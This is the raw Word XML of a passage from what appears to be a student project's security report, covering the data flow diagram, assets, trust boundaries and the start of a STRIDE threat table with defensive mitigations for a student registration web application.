        </w:rPr>
        <w:t>ed “transcript verification” URL a student pastes in, so they can confirm they copied the right link before submitting it. This is the one flow that crosses the trust boundary out to a third party, and is the focus of the SSRF analysis in Section 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71778F98" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The di</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>agram below shows the numbered data flows referenced throughout the STRIDE analysis in Section 3. The dashed box marks the trust boundary around the application server; everything inside it is under this project's direct control, everything outside it (the</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> student's browser, the admin's browser, and the external verification site) is not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC9D6D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E1B411" wp14:editId="74A98CF3">
            <wp:extent cx="5905500" cy="427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76725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC024F4" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="0010598A" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010598A">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1: Data flow diagram of the Student Registration application, showing the trust boundary around the application server and the numbered flows referenced in Sectio</w:t>
      </w:r>
      <w:r w:rsidRPr="0010598A">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5693FC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078013D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>3. STRIDE Threat Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D46111" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>3.1 Assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CB632" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>User credentials (password hashes, session tokens)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33068118" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Student personal data (names, matric numbers, emails, uploaded documents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9342E6" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Course and enrolment records (integrity of academic records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A2879" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Application availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FAFA2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server's network position (whether it can be abused to reach other internal or external hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB18F21" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>3.2 Trust Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC9E16" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Browser ↔ Application server (flows 1, 5, 7, 9, 12, 14 in Figure 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D97534" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Application server ↔ MySQL (flows 2, 6, 8, 11, 15, 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1672231C" w14:textId="74785413" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00F411AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Application serve</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r ↔ External verification site (flow 13) — the only third</w:t>
      </w:r>
      <w:r w:rsidR="00FA5D0C">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>party egress, and the focus of the SSRF analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9AD22" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>3.3 STRIDE Analysis by Data Flow</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3600"/>
        <w:gridCol w:w="4060"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5437CBFE" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:trPr>
          <w:trHeight w:val="275"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="7533C186" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00FA5D0C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="5D941927" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00FA5D0C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat (STRIDE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="1595E787" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00FA5D0C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
          </w:tcPr>
          <w:p w14:paraId="32DFF146" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A" w:rsidP="00FA5D0C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="597CB116" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B99A6A3" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="509AB379" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="59E41753" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential stuffing / brute force against login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E5FBA59" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rate </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>limiting (5 attempts / 15 min) + temporary account lockout; generic error message prevents user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="7F487111" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1FA28125" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="38412E5A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="379BF83B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL injection to bypass authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="758EB87C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100% parameterised queries (PDO, emulated prepares disabled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="62172C3D" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19269B7B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="79276C5C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Info. Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78750BD7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Timing </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>side-channel reveals valid accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D543237" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>password_verify() always runs, even against a dummy hash, so timing doesn't distinguish “no such user” from “wrong password”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5CEAD75D" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2E090C35" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2C26243F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E495A4E" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No audit trail of attack attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F1A3EDF" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>security_events table + JSON-line log record</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> every failure/lockout/denial with timestamp, IP, subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="51D52CF1" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3854E96C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C8B9786" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Spoofing / EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0240A781" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0566BFB5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>session_regenerate_id() on every successful login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="19F5A284" w14:textId="77777777" w:rsidTr="000D0F6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A29EE22" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="35A1820B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Info. Disclosure</w:t>
